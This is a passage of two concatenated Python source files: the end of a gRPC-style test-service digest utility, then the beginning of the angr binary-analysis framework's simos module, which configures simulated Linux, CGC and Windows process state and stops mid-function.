self.style = style.Service.EVENT
def stream_stream_event(self, response_consumer, context):
request_consumer = self._test_method.service(response_consumer, context,
self._control)
if self._pool is None:
return request_consumer
else:
return stream_util.ThreadSwitchingConsumer(request_consumer,
self._pool)
class _UnaryConsumer(stream.Consumer):
"""A Consumer that only allows consumption of exactly one value."""
def __init__(self, action):
self._lock = threading.Lock()
self._action = action
self._consumed = False
self._terminated = False
def consume(self, value):
with self._lock:
if self._consumed:
raise ValueError('Unary consumer already consumed!')
elif self._terminated:
raise ValueError('Unary consumer already terminated!')
else:
self._consumed = True
self._action(value)
def terminate(self):
with self._lock:
if not self._consumed:
raise ValueError('Unary consumer hasn\'t yet consumed!')
elif self._terminated:
raise ValueError('Unary consumer already terminated!')
else:
self._terminated = True
def consume_and_terminate(self, value):
with self._lock:
if self._consumed:
raise ValueError('Unary consumer already consumed!')
elif self._terminated:
raise ValueError('Unary consumer already terminated!')
else:
self._consumed = True
self._terminated = True
self._action(value)
class _UnaryUnaryAdaptation(object):
def __init__(self, unary_unary_test_method):
self._method = unary_unary_test_method
def service(self, response_consumer, context, control):
def action(request):
self._method.service(request,
response_consumer.consume_and_terminate,
context, control)
return _UnaryConsumer(action)
class _UnaryStreamAdaptation(object):
def __init__(self, unary_stream_test_method):
self._method = unary_stream_test_method
def service(self, response_consumer, context, control):
def action(request):
self._method.service(request, response_consumer, context, control)
return _UnaryConsumer(action)
class _StreamUnaryAdaptation(object):
def __init__(self, stream_unary_test_method):
self._method = stream_unary_test_method
def service(self, response_consumer, context, control):
return self._method.service(response_consumer.consume_and_terminate,
context, control)
class _MultiMethodImplementation(face.MultiMethodImplementation):
def __init__(self, methods, control, pool):
self._methods = methods
self._control = control
self._pool = pool
def service(self, group, name, response_consumer, context):
method = self._methods.get(group, name, None)
if method is None:
raise face.NoSuchMethodError(group, name)
elif self._pool is None:
return method(response_consumer, context, self._control)
else:
request_consumer = method(response_consumer, context, self._control)
return stream_util.ThreadSwitchingConsumer(request_consumer,
self._pool)
class _Assembly(
collections.namedtuple(
'_Assembly',
['methods', 'inlines', 'events', 'adaptations', 'messages'])):
"""An intermediate structure created when creating a TestServiceDigest."""
def _assemble(scenarios, identifiers, inline_method_constructor,
event_method_constructor, adapter, control, pool):
"""Creates an _Assembly from the given scenarios."""
methods = {}
inlines = {}
events = {}
adaptations = {}
messages = {}
for identifier, scenario in six.iteritems(scenarios):
if identifier in identifiers:
raise ValueError('Repeated identifier "(%s, %s)"!' % identifier)
test_method = scenario[0]
inline_method = inline_method_constructor(test_method, control)
event_method = event_method_constructor(test_method, control, pool)
adaptation = adapter(test_method)
methods[identifier] = test_method
inlines[identifier] = inline_method
events[identifier] = event_method
adaptations[identifier] = adaptation
messages[identifier] = scenario[1]
return _Assembly(methods, inlines, events, adaptations, messages)
def digest(service, control, pool):
"""Creates a TestServiceDigest from a TestService.
Args:
service: A _service.TestService.
control: A test_control.Control.
pool: If RPC methods should be serviced in a separate thread, a thread pool.
None if RPC methods should be serviced in the thread belonging to the
run-time that calls for their service.
Returns:
A TestServiceDigest synthesized from the given service.TestService.
"""
identifiers = set()
unary_unary = _assemble(service.unary_unary_scenarios(), identifiers,
_InlineUnaryUnaryMethod, _EventUnaryUnaryMethod,
_UnaryUnaryAdaptation, control, pool)
identifiers.update(unary_unary.inlines)
unary_stream = _assemble(service.unary_stream_scenarios(), identifiers,
_InlineUnaryStreamMethod, _EventUnaryStreamMethod,
_UnaryStreamAdaptation, control, pool)
identifiers.update(unary_stream.inlines)
stream_unary = _assemble(service.stream_unary_scenarios(), identifiers,
_InlineStreamUnaryMethod, _EventStreamUnaryMethod,
_StreamUnaryAdaptation, control, pool)
identifiers.update(stream_unary.inlines)
stream_stream = _assemble(service.stream_stream_scenarios(), identifiers,
_InlineStreamStreamMethod,
_EventStreamStreamMethod, _IDENTITY, control,
pool)
identifiers.update(stream_stream.inlines)
methods = dict(unary_unary.methods)
methods.update(unary_stream.methods)
methods.update(stream_unary.methods)
methods.update(stream_stream.methods)
adaptations = dict(unary_unary.adaptations)
adaptations.update(unary_stream.adaptations)
adaptations.update(stream_unary.adaptations)
adaptations.update(stream_stream.adaptations)
inlines = dict(unary_unary.inlines)
inlines.update(unary_stream.inlines)
inlines.update(stream_unary.inlines)
inlines.update(stream_stream.inlines)
events = dict(unary_unary.events)
events.update(unary_stream.events)
events.update(stream_unary.events)
events.update(stream_stream.events)
return TestServiceDigest(
methods, inlines, events,
_MultiMethodImplementation(adaptations, control, pool),
unary_unary.messages, unary_stream.messages, stream_unary.messages,
stream_stream.messages)
|
|
"""
Manage OS-level configuration.
"""
import os
import logging
from collections import defaultdict
from archinfo import ArchARM, ArchMIPS32, ArchMIPS64, ArchX86, ArchAMD64, ArchPPC32, ArchPPC64, ArchAArch64
from cle import MetaELF, BackedCGC
from cle.address_translator import AT
import claripy
from .errors import (
AngrUnsupportedSyscallError,
AngrCallableError,
AngrCallableMultistateError,
AngrSimOSError,
SimUnsupportedError,
SimSegfaultError,
)
from .tablespecs import StringTableSpec
from .sim_state import SimState
from .state_plugins import SimStateSystem, SimActionData
from .calling_conventions import DEFAULT_CC, SYSCALL_CC
from .procedures import SIM_PROCEDURES as P, SIM_LIBRARIES as L
from . import sim_options as o
l = logging.getLogger("angr.simos")
class IRange(object):
"""
A simple range object for testing inclusion. Like xrange but works for huge numbers.
"""
__slots__ = ('start', 'end')
def __init__(self, start, end):
self.start = start
self.end = end
def __contains__(self, k):
if type(k) in (int, long):
return k >= self.start and k < self.end
return False
def __getstate__(self):
return self.start, self.end
def __setstate__(self, state):
self.start, self.end = state
class SimOS(object):
"""
A class describing OS/arch-level configuration.
"""
def __init__(self, project, name=None):
self.arch = project.arch
self.project = project
self.name = name
self.return_deadend = None
def configure_project(self):
"""
Configure the project to set up global settings (like SimProcedures).
"""
self.return_deadend = self.project.loader.extern_object.allocate()
self.project.hook(self.return_deadend, P['stubs']['CallReturn']())
def irelative_resolver(resolver_addr):
# autohooking runs before this does, might have provided this already
if self.project.is_hooked(resolver_addr):
return
resolver = self.project.factory.callable(resolver_addr, concrete_only=True)
try:
val = resolver()
except AngrCallableMultistateError:
l.error("Resolver at %#x failed to resolve! (multivalued)", resolver_addr)
return None
except AngrCallableError:
l.error("Resolver at %#x failed to resolve!", resolver_addr)
return None
return val._model_concrete.value
self.project.loader.perform_irelative_relocs(irelative_resolver)
def _weak_hook_symbol(self, name, hook, scope=None):
if scope is None:
sym = self.project.loader.find_symbol(name)
else:
sym = scope.get_symbol(name)
if sym is not None:
if self.project.is_hooked(sym.rebased_addr):
if not self.project.hooked_by(sym.rebased_addr).is_stub:
return
self.project.hook(sym.rebased_addr, hook)
def state_blank(self, addr=None, initial_prefix=None, stack_size=1024*1024*8, **kwargs):
"""
Initialize a blank state.
All parameters are optional.
:param addr: The execution start address.
:param initial_prefix:
:param stack_size: The number of bytes to allocate for stack space
:return: The initialized SimState.
Any additional arguments will be passed to the SimState constructor
"""
# TODO: move ALL of this into the SimState constructor
if kwargs.get('mode', None) is None:
kwargs['mode'] = self.project._default_analysis_mode
if kwargs.get('permissions_backer', None) is None:
# just a dict of address ranges to permission bits
permission_map = { }
for obj in self.project.loader.all_objects:
for seg in obj.segments:
perms = 0
# bit values based off of protection bit values from sys/mman.h
if seg.is_readable:
perms |= 1 # PROT_READ
if seg.is_writable:
perms |= 2 # PROT_WRITE
if seg.is_executable:
perms |= 4 # PROT_EXEC
permission_map[(seg.min_addr, seg.max_addr)] = perms
permissions_backer = (self.project.loader.main_object.execstack, permission_map)
kwargs['permissions_backer'] = permissions_backer
if kwargs.get('memory_backer', None) is None:
kwargs['memory_backer'] = self.project.loader.memory
if kwargs.get('os_name', None) is None:
kwargs['os_name'] = self.name
state = SimState(self.project, **kwargs)
stack_end = state.arch.initial_sp
if o.ABSTRACT_MEMORY not in state.options:
state.memory.mem._preapproved_stack = IRange(stack_end - stack_size, stack_end)
if o.INITIALIZE_ZERO_REGISTERS in state.options:
highest_reg_offset, reg_size = max(state.arch.registers.values())
for i in range(0, highest_reg_offset + reg_size, state.arch.bytes):
state.registers.store(i, state.se.BVV(0, state.arch.bits))
if state.arch.sp_offset is not None:
state.regs.sp = stack_end
if initial_prefix is not None:
for reg in state.arch.default_symbolic_registers:
state.registers.store(reg, claripy.BVS(initial_prefix + "_" + reg,
state.arch.bits,
explicit_name=True))
for reg, val, is_addr, mem_region in state.arch.default_register_values:
region_base = None # so pycharm does not complain
if is_addr:
if isinstance(mem_region, tuple):
# unpack it
mem_region, region_base = mem_region
elif mem_region == 'global':
# Backward compatibility
region_base = 0
else:
raise AngrSimOSError('You must specify the base address for memory region "%s". ' % mem_region)
if o.ABSTRACT_MEMORY in state.options and is_addr:
address = claripy.ValueSet(state.arch.bits, mem_region, region_base, val)
state.registers.store(reg, address)
else:
state.registers.store(reg, val)
if addr is None: addr = self.project.entry
state.regs.ip = addr
# set up the "root history" node
state.scratch.ins_addr = addr
state.scratch.bbl_addr = addr
state.scratch.stmt_idx = 0
state.history.jumpkind = 'Ijk_Boring'
return state
def state_entry(self, **kwargs):
return self.state_blank(**kwargs)
def state_full_init(self, **kwargs):
return self.state_entry(**kwargs)
def state_call(self, addr, *args, **kwargs):
cc = kwargs.pop('cc', DEFAULT_CC[self.arch.name](self.project.arch))
state = kwargs.pop('base_state', None)
toc = kwargs.pop('toc', None)
ret_addr = kwargs.pop('ret_addr', self.return_deadend)
stack_base = kwargs.pop('stack_base', None)
alloc_base = kwargs.pop('alloc_base', None)
grow_like_stack = kwargs.pop('grow_like_stack', True)
if state is None:
state = self.state_blank(addr=addr, **kwargs)
else:
state = state.copy()
state.regs.ip = addr
cc.setup_callsite(state, ret_addr, args, stack_base, alloc_base, grow_like_stack)
if state.arch.name == 'PPC64' and toc is not None:
state.regs.r2 = toc
return state
def prepare_call_state(self, calling_state, initial_state=None,
preserve_registers=(), preserve_memory=()):
"""
This function prepares a state that is executing a call instruction.
If given an initial_state, it copies over all of the critical registers to it from the
calling_state. Otherwise, it prepares the calling_state for action.
This is mostly used to create minimalistic for CFG generation. Some ABIs, such as MIPS PIE and
x86 PIE, require certain information to be maintained in certain registers. For example, for
PIE MIPS, this function transfer t9, gp, and ra to the new state.
"""
if isinstance(self.arch, ArchMIPS32):
if initial_state is not None:
initial_state = self.state_blank()
mips_caller_saves = ('s0', 's1', 's2', 's3', 's4', 's5', 's6', 's7', 'gp', 'sp', 'bp', 'ra')
preserve_registers = preserve_registers + mips_caller_saves + ('t9',)
if initial_state is None:
new_state = calling_state.copy()
else:
new_state = initial_state.copy()
for reg in set(preserve_registers):
new_state.registers.store(reg, calling_state.registers.load(reg))
for addr, val in set(preserve_memory):
new_state.memory.store(addr, calling_state.memory.load(addr, val))
return new_state
def prepare_function_symbol(self, symbol_name, basic_addr=None):
"""
Prepare the address space with the data necessary to perform relocations pointing to the given symbol
Returns a 2-tuple. The first item is the address of the function code, the second is the address of the
relocation target.
"""
if basic_addr is None:
basic_addr = self.project.loader.extern_object.get_pseudo_addr(symbol_name)
return basic_addr, basic_addr
def handle_exception(self, successors, engine, exc_type, exc_value, exc_traceback):
"""
Perform exception handling. This method will be called when, during execution, a SimException is thrown.
Currently, this can only indicate a segfault, but in the future it could indicate any unexpected exceptional
behavior that can't be handled by ordinary control flow.
The method may mutate the provided SimSuccessors object in any way it likes, or re-raise the exception.
:param successors: The SimSuccessors object currently being executed on
:param engine: The engine that was processing this step
:param exc_type: The value of sys.exc_info()[0] from the error, the type of the exception that was raised
:param exc_value: The value of sys.exc_info()[1] from the error, the actual exception object
:param exc_traceback: The value of sys.exc_info()[2] from the error, the traceback from the exception
"""
raise exc_type, exc_value, exc_traceback
# Dummy stuff to allow this API to be used freely
# pylint: disable=unused-argument, no-self-use
def syscall(self, state, allow_unsupported=True):
return None
def is_syscall_addr(self, addr):
return False
def syscall_from_addr(self, addr, allow_unsupported=True):
return None
def syscall_from_number(self, number, allow_unsupported=True):
return None
class SimUserland(SimOS):
"""
This is a base class for any SimOS that wants to support syscalls.
It uses the CLE kernel object to provide addresses for syscalls. Syscalls will be emulated as a jump to one of these
addresses, where a SimProcedure from the syscall library provided at construction time will be executed.
"""
def __init__(self, project, syscall_library=None, **kwargs):
super(SimUserland, self).__init__(project, **kwargs)
self.syscall_library = syscall_library
self.kernel_base = None
def configure_project(self):
super(SimUserland, self).configure_project()
self.kernel_base = self.project.loader.kernel_object.mapped_base
def syscall(self, state, allow_unsupported=True):
"""
Given a state, return the procedure corresponding to the current syscall.
This procedure will have .syscall_number, .display_name, and .addr set.
:param state: The state to get the syscall number from
:param allow_unsupported Whether to return a "dummy" sycall instead of raising an unsupported exception
"""
if state.os_name in SYSCALL_CC[state.arch.name]:
cc = SYSCALL_CC[state.arch.name][state.os_name](state.arch)
else:
# Use the default syscall calling convention - it may bring problems
cc = SYSCALL_CC[state.arch.name]['default'](state.arch)
sym_num = cc.syscall_num(state)
possible = state.solver.eval_upto(sym_num, 2)
if len(possible) == 0:
raise AngrUnsupportedSyscallError("The program state is not satisfiable")
elif len(possible) == 1:
num = possible[0]
elif allow_unsupported:
num = self.syscall_library.maximum_syscall_number(self.arch.name) + 1 if self.syscall_library else 0
else:
raise AngrUnsupportedSyscallError("Got a symbolic syscall number")
proc = self.syscall_from_number(num, allow_unsupported=allow_unsupported)
proc.cc = cc
return proc
def is_syscall_addr(self, addr):
"""
Return whether or not the given address corresponds to a syscall.
"""
if self.kernel_base is None:
return False
addr -= self.kernel_base
return 0 <= addr < 0x4000 # TODO: make this number come from somewhere
def syscall_from_addr(self, addr, allow_unsupported=True):
"""
Get a syscall SimProcedure from an address.
:param addr: The address to convert to a syscall SimProcedure
:param allow_unsupported: Whether to return a dummy procedure for an unsupported syscall instead of raising an
exception.
:return: The SimProcedure for the syscall, or None if the address is not a syscall address.
"""
if not self.is_syscall_addr(addr):
return None
number = addr - self.kernel_base
return self.syscall_from_number(number, allow_unsupported=allow_unsupported)
def syscall_from_number(self, number, allow_unsupported=True):
if not allow_unsupported and not self.syscall_library:
raise AngrUnsupportedSyscallError("%s does not have a library of syscalls implemented", self.name)
addr = number + self.kernel_base
if self.syscall_library is None:
proc = P['stubs']['syscall']()
elif not allow_unsupported and not self.syscall_library.has_implementation(number, self.arch):
raise AngrUnsupportedSyscallError("No implementation for syscall %d" % number)
else:
proc = self.syscall_library.get(number, self.arch)
proc.addr = addr
return proc
class SimLinux(SimUserland):
"""
OS-specific configuration for \\*nix-y OSes.
"""
def __init__(self, project, **kwargs):
super(SimLinux, self).__init__(project, syscall_library=L['linux'], name="Linux", **kwargs)
self._loader_addr = None
self._loader_lock_addr = None
self._loader_unlock_addr = None
self._error_catch_tsd_addr = None
self._vsyscall_addr = None
def configure_project(self):
super(SimLinux, self).configure_project()
self._loader_addr = self.project.loader.extern_object.allocate()
self._loader_lock_addr = self.project.loader.extern_object.allocate()
self._loader_unlock_addr = self.project.loader.extern_object.allocate()
self._error_catch_tsd_addr = self.project.loader.extern_object.allocate()
self._vsyscall_addr = self.project.loader.extern_object.allocate()
self.project.hook(self._loader_addr, P['linux_loader']['LinuxLoader']())
self.project.hook(self._loader_lock_addr, P['linux_loader']['_dl_rtld_lock_recursive']())
self.project.hook(self._loader_unlock_addr, P['linux_loader']['_dl_rtld_unlock_recursive']())
self.project.hook(self._error_catch_tsd_addr, P['linux_loader']['_dl_initial_error_catch_tsd'](static_addr=self.project.loader.extern_object.allocate()))
self.project.hook(self._vsyscall_addr, P['linux_kernel']['_vsyscall']())
ld_obj = self.project.loader.linux_loader_object
if ld_obj is not None:
# there are some functions we MUST use the simprocedures for, regardless of what the user wants
self._weak_hook_symbol('__tls_get_addr', L['ld.so'].get('__tls_get_addr', self.arch), ld_obj)
self._weak_hook_symbol('___tls_get_addr', L['ld.so'].get('___tls_get_addr', self.arch), ld_obj)
# set up some static data in the loader object...
_rtld_global = ld_obj.get_symbol('_rtld_global')
if _rtld_global is not None:
if isinstance(self.project.arch, ArchAMD64):
self.project.loader.memory.write_addr_at(_rtld_global.rebased_addr + 0xF08, self._loader_lock_addr)
self.project.loader.memory.write_addr_at(_rtld_global.rebased_addr + 0xF10, self._loader_unlock_addr)
self.project.loader.memory.write_addr_at(_rtld_global.rebased_addr + 0x990, self._error_catch_tsd_addr)
# TODO: what the hell is this
_rtld_global_ro = ld_obj.get_symbol('_rtld_global_ro')
if _rtld_global_ro is not None:
pass
tls_obj = self.project.loader.tls_object
if tls_obj is not None:
if isinstance(self.project.arch, ArchAMD64):
self.project.loader.memory.write_addr_at(tls_obj.thread_pointer + 0x28, 0x5f43414e4152595f)
self.project.loader.memory.write_addr_at(tls_obj.thread_pointer + 0x30, 0x5054524755415244)
elif isinstance(self.project.arch, ArchX86):
self.project.loader.memory.write_addr_at(tls_obj.thread_pointer + 0x10, self._vsyscall_addr)
elif isinstance(self.project.arch, ArchARM):
self.project.hook(0xffff0fe0, P['linux_kernel']['_kernel_user_helper_get_tls']())
# Only set up ifunc resolution if we are using the ELF backend on AMD64
if isinstance(self.project.loader.main_object, MetaELF):
if isinstance(self.project.arch, ArchAMD64):
for binary in self.project.loader.all_objects:
if not isinstance(binary, MetaELF):
continue
for reloc in binary.relocs:
if reloc.symbol is None or reloc.resolvedby is None:
continue
try:
if reloc.resolvedby.elftype != 'STT_GNU_IFUNC':
continue
except AttributeError:
continue
gotaddr = reloc.rebased_addr
gotvalue = self.project.loader.memory.read_addr_at(gotaddr)
if self.project.is_hooked(gotvalue):
continue
# Replace it with a ifunc-resolve simprocedure!
kwargs = {
'funcaddr': gotvalue,
'gotaddr': gotaddr,
'funcname': reloc.symbol.name
}
# TODO: should this be replaced with hook_symbol?
randaddr = self.project.loader.extern_object.allocate()
self.project.hook(randaddr, P['linux_loader']['IFuncResolver'](**kwargs))
self.project.loader.memory.write_addr_at(gotaddr, randaddr)
# pylint: disable=arguments-differ
def state_blank(self, fs=None, concrete_fs=False, chroot=None, **kwargs):
state = super(SimLinux, self).state_blank(**kwargs)
if self.project.loader.tls_object is not None:
if isinstance(state.arch, ArchAMD64):
state.regs.fs = self.project.loader.tls_object.user_thread_pointer
elif isinstance(state.arch, ArchX86):
state.regs.gs = self.project.loader.tls_object.user_thread_pointer >> 16
elif isinstance(state.arch, (ArchMIPS32, ArchMIPS64)):
state.regs.ulr = self.project.loader.tls_object.user_thread_pointer
elif isinstance(state.arch, ArchPPC32):
state.regs.r2 = self.project.loader.tls_object.user_thread_pointer
elif isinstance(state.arch, ArchPPC64):
state.regs.r13 = self.project.loader.tls_object.user_thread_pointer
elif isinstance(state.arch, ArchAArch64):
state.regs.tpidr_el0 = self.project.loader.tls_object.user_thread_pointer
last_addr = self.project.loader.main_object.max_addr
brk = last_addr - last_addr % 0x1000 + 0x1000
state.register_plugin('posix', SimStateSystem(fs=fs, concrete_fs=concrete_fs, chroot=chroot, brk=brk))
if self.project.loader.main_object.is_ppc64_abiv1:
state.libc.ppc64_abiv = 'ppc64_1'
return state
def state_entry(self, args=None, env=None, argc=None, **kwargs):
state = super(SimLinux, self).state_entry(**kwargs)
# Handle default values
if args is None:
args = []
if env is None:
env = {}
# Prepare argc
if argc is None:
argc = claripy.BVV(len(args), state.arch.bits)
elif type(argc) in (int, long): # pylint: disable=unidiomatic-typecheck
argc = claripy.BVV(argc, state.arch.bits)
# Make string table for args/env/auxv
table = StringTableSpec()
# Add args to string table
for arg in args:
table.add_string(arg)
table.add_null()
# Add environment to string table
for k, v in env.iteritems():
if type(k) is str: # pylint: disable=unidiomatic-typecheck
k = claripy.BVV(k)
elif type(k) is unicode: # pylint: disable=unidiomatic-typecheck
k = claripy.BVV(k.encode('utf-8'))
elif isinstance(k, claripy.ast.Bits):
pass
else:
raise TypeError("Key in env must be either string or bitvector")
if type(v) is str: # pylint: disable=unidiomatic-typecheck
v = claripy.BVV(v)
elif type(v) is unicode: # pylint: disable=unidiomatic-typecheck
v = claripy.BVV(v.encode('utf-8'))
elif isinstance(v, claripy.ast.Bits):
pass
else:
raise TypeError("Value in env must be either string or bitvector")
table.add_string(k.concat(claripy.BVV('='), v))
table.add_null()
# Prepare the auxiliary vector and add it to the end of the string table
# TODO: Actually construct a real auxiliary vector
# current vector is an AT_RANDOM entry where the "random" value is 0xaec0aec0aec0...
aux = [(25, ("AEC0"*8).decode('hex'))]
for a, b in aux:
table.add_pointer(a)
if isinstance(b, str):
table.add_string(b)
else:
table.add_pointer(b)
table.add_null()
table.add_null()
# Dump the table onto the stack, calculate pointers to args, env, and auxv
state.memory.store(state.regs.sp - 16, claripy.BVV(0, 8*16))
argv = table.dump(state, state.regs.sp - 16)
envp = argv + ((len(args) + 1) * state.arch.bytes)
auxv = argv + ((len(args) + len(env) + 2) * state.arch.bytes)
# Put argc on stack and fix the stack pointer
newsp = argv - state.arch.bytes
state.memory.store(newsp, argc, endness=state.arch.memory_endness)
state.regs.sp = newsp
if state.arch.name in ('PPC32',):
state.stack_push(claripy.BVV(0, 32))
state.stack_push(claripy.BVV(0, 32))
state.stack_push(claripy.BVV(0, 32))
state.stack_push(claripy.BVV(0, 32))
# store argc argv envp auxv in the posix plugin
state.posix.argv = argv
state.posix.argc = argc
state.posix.environ = envp
state.posix.auxv = auxv
self.set_entry_register_values(state)
return state
def set_entry_register_values(self, state):
for reg, val in state.arch.entry_register_values.iteritems():
if isinstance(val, (int, long)):
state.registers.store(reg, val, size=state.arch.bytes)
elif isinstance(val, (str,)):
if val == 'argc':
state.registers.store(reg, state.posix.argc, size=state.arch.bytes)
elif val == 'argv':
state.registers.store(reg, state.posix.argv)
elif val == 'envp':
state.registers.store(reg, state.posix.environ)
elif val == 'auxv':
state.registers.store(reg, state.posix.auxv)
elif val == 'ld_destructor':
# a pointer to the dynamic linker's destructor routine, to be called at exit
# or NULL. We like NULL. It makes things easier.
state.registers.store(reg, 0)
elif val == 'toc':
if self.project.loader.main_object.is_ppc64_abiv1:
state.registers.store(reg, self.project.loader.main_object.ppc64_initial_rtoc)
elif val == 'thread_pointer':
state.registers.store(reg, self.project.loader.tls_object.user_thread_pointer)
else:
l.warning('Unknown entry point register value indicator "%s"', val)
else:
l.error('What the ass kind of default value is %s?', val)
def state_full_init(self, **kwargs):
kwargs['addr'] = self._loader_addr
return super(SimLinux, self).state_full_init(**kwargs)
def prepare_function_symbol(self, symbol_name, basic_addr=None):
"""
Prepare the address space with the data necessary to perform relocations pointing to the given symbol.
Returns a 2-tuple. The first item is the address of the function code, the second is the address of the
relocation target.
"""
if self.project.loader.main_object.is_ppc64_abiv1:
if basic_addr is not None:
pointer = self.project.loader.memory.read_addr_at(basic_addr)
return pointer, basic_addr
pseudo_hookaddr = self.project.loader.extern_object.get_pseudo_addr(symbol_name)
pseudo_toc = self.project.loader.extern_object.allocate(size=0x18)
self.project.loader.extern_object.memory.write_addr_at(AT.from_mva(pseudo_toc, self.project.loader.extern_object).to_rva(), pseudo_hookaddr)
return pseudo_hookaddr, pseudo_toc
else:
if basic_addr is None:
basic_addr = self.project.loader.extern_object.get_pseudo_addr(symbol_name)
return basic_addr, basic_addr
class SimCGC(SimUserland):
"""
Environment configuration for the CGC DECREE platform
"""
def __init__(self, project, **kwargs):
super(SimCGC, self).__init__(project, syscall_library=L['cgcabi'], name="CGC", **kwargs)
# pylint: disable=arguments-differ
def state_blank(self, fs=None, **kwargs):
s = super(SimCGC, self).state_blank(**kwargs) # pylint:disable=invalid-name
# Special stack base for CGC binaries to work with Shellphish CRS
s.regs.sp = 0xbaaaaffc
# Map the special cgc memory
if o.ABSTRACT_MEMORY not in s.options:
s.memory.mem._preapproved_stack = IRange(0xbaaab000 - 1024*1024*8, 0xbaaab000)
s.memory.map_region(0x4347c000, 4096, 1)
s.register_plugin('posix', SimStateSystem(fs=fs))
# Create the CGC plugin
s.get_plugin('cgc')
# set up the address for concrete transmits
s.unicorn.transmit_addr = self.syscall_from_number(2).addr
return s
def state_entry(self, **kwargs):
if isinstance(self.project.loader.main_object, BackedCGC):
kwargs['permissions_backer'] = (True, self.project.loader.main_object.permissions_map)
kwargs['add_options'] = {o.CGC_ZERO_FILL_UNCONSTRAINED_MEMORY} | kwargs.get('add_options', set())
state = super(SimCGC, self).state_entry(**kwargs)
if isinstance(self.project.loader.main_object, BackedCGC):
for reg, val in self.project.loader.main_object.initial_register_values():
if reg in state.arch.registers:
setattr(state.regs, reg, val)
elif reg == 'eflags':
pass
elif reg == 'fctrl':
state.regs.fpround = (val & 0xC00) >> 10
elif reg == 'fstat':
state.regs.fc3210 = (val & 0x4700)
elif reg == 'ftag':
empty_bools = [((val >> (x*2)) & 3) == 3 for x in xrange(8)]
tag_chars = [claripy.BVV(0 if x else 1, 8) for x in empty_bools]
for i, tag in enumerate(tag_chars):
setattr(state.regs, 'fpu_t%d' % i, tag)
elif reg in ('fiseg', 'fioff', 'foseg', 'fooff', 'fop'):
pass
elif reg == 'mxcsr':
state.regs.sseround = (val & 0x600) >> 9
else:
l.error("What is this register %s I have to translate?", reg)
# Update allocation base
state.cgc.allocation_base = self.project.loader.main_object.current_allocation_base
# Do all the writes
writes_backer = self.project.loader.main_object.writes_backer
stdout = 1
for size in writes_backer:
if size == 0:
continue
str_to_write = state.posix.files[1].content.load(state.posix.files[1].pos, size)
a = SimActionData(state, 'file_1_0', 'write', addr=claripy.BVV(state.posix.files[1].pos, state.arch.bits), data=str_to_write, size=size)
state.posix.write(stdout, str_to_write, size)
state.history.add_action(a)
else:
# Set CGC-specific variables
state.regs.eax = 0
state.regs.ebx = 0
state.regs.ecx = 0x4347c000
state.regs.edx = 0
state.regs.edi = 0
state.regs.esi = 0
state.regs.esp = 0xbaaaaffc
state.regs.ebp = 0
state.regs.cc_dep1 = 0x202 # default eflags
state.regs.cc_op = 0 # OP_COPY
state.regs.cc_dep2 = 0 # doesn't matter
state.regs.cc_ndep = 0 # doesn't matter
# fpu values
state.regs.mm0 = 0
state.regs.mm1 = 0
state.regs.mm2 = 0
state.regs.mm3 = 0
state.regs.mm4 = 0
state.regs.mm5 = 0
state.regs.mm6 = 0
state.regs.mm7 = 0
state.regs.fpu_tags = 0
state.regs.fpround = 0
state.regs.fc3210 = 0x0300
state.regs.ftop = 0
# sse values
state.regs.sseround = 0
state.regs.xmm0 = 0
state.regs.xmm1 = 0
state.regs.xmm2 = 0
state.regs.xmm3 = 0
state.regs.xmm4 = 0
state.regs.xmm5 = 0
state.regs.xmm6 = 0
state.regs.xmm7 = 0
# segmentation registers
state.regs.ds = 0
state.regs.es = 0
state.regs.fs = 0
state.regs.gs = 0
state.regs.ss = 0
state.regs.cs = 0
return state
class SimWindows(SimOS):
"""
Environemnt for the Windows Win32 subsystem. Does not support syscalls currently.
"""
def __init__(self, project, **kwargs):
super(SimWindows, self).__init__(project, name='Win32', **kwargs)
self._exception_handler = None
def configure_project(self):
super(SimWindows, self).configure_project()
# here are some symbols which we MUST hook, regardless of what the user wants
self._weak_hook_symbol('GetProcAddress', L['kernel32.dll'].get('GetProcAddress', self.arch))
self._weak_hook_symbol('LoadLibraryA', L['kernel32.dll'].get('LoadLibraryA', self.arch))
self._weak_hook_symbol('LoadLibraryExW', L['kernel32.dll'].get('LoadLibraryExW', self.arch))
self._exception_handler = self.project.loader.extern_object.allocate()
self.project.hook(self._exception_handler, P['ntdll']['KiUserExceptionDispatcher']())
# pylint: disable=arguments-differ
def state_entry(self, args=None, **kwargs):
if args is None: args = []
state = super(SimWindows, self).state_entry(**kwargs)
state.regs.sp = state.regs.sp - 0x80 # give us some stack space to work with...?
return state
def state_blank(self, **kwargs):
if self.project.loader.main_object.supports_nx:
add_options = kwargs.get('add_options', set())
add_options.add(o.ENABLE_NX)
kwargs['add_options'] = add_options
state = super(SimWindows, self).state_blank(**kwargs)
# yikes!!!
fun_stuff_addr = state.libc.mmap_base
if fun_stuff_addr & 0xffff != 0:
fun_stuff_addr += 0x10000 - (fun_stuff_addr & 0xffff)
state.libc.mmap_base = fun_stuff_addr + 0x5000
state.memory.map_region(fun_stuff_addr, 0x5000, claripy.BVV(3, 3))
TIB_addr = fun_stuff_addr
PEB_addr = fun_stuff_addr + 0x1000
LDR_addr = fun_stuff_addr + 0x2000
if state.arch.name == 'X86':
state.mem[TIB_addr + 0].dword = 0 # Initial SEH frame
state.mem[TIB_addr + 4].dword = state.regs.sp # stack base (high addr)
state.mem[TIB_addr + 8].dword = state.regs.sp - 0x100000 # stack limit (low addr)
state.mem[TIB_addr + 0x18].dword = TIB_addr # myself!
state.mem[TIB_addr + 0x24].dword = 0xbad76ead # thread id
if self.project.loader.tls_object is not None:
state.mem[TIB_addr + 0x2c].dword = self.project.loader.tls_object.user_thread_pointer # tls array pointer
state.mem[TIB_addr + 0x30].dword = PEB_addr # PEB addr, of course
state.regs.fs = TIB_addr >> 16
state.mem[PEB_addr + 0xc].dword = LDR_addr
# OKAY IT'S TIME TO SUFFER
# http://sandsprite.com/CodeStuff/Understanding_the_Peb_Loader_Data_List.html
THUNK_SIZE = 0x100
num_pe_objects = len(self.project.loader.all_pe_objects)
ALLOC_AREA = LDR_addr + THUNK_SIZE * num_pe_objects
for i, obj in enumerate(self.project.loader.all_pe_objects):
# Create a LDR_MODULE, we'll handle the links later...
obj.module_id = i+1 # HACK HACK HACK HACK
addr = LDR_addr + (i+1) * THUNK_SIZE
state.mem[addr+0x18].dword = obj.mapped_base
state.mem[addr+0x1C].dword = obj.entry
# Allocate some space from the same region to store the paths
path = obj.binary # we're in trouble if this is None
alloc_size = len(path) * 2 + 2
tail_start = (len(path) - len(os.path.basename(path))) * 2
state.mem[addr+0x24].short = alloc_size
state.mem[addr+0x26].short = alloc_size
state.mem[addr+0x28].dword = ALLOC_AREA
state.mem[addr+0x2C].short = alloc_size - tail_start
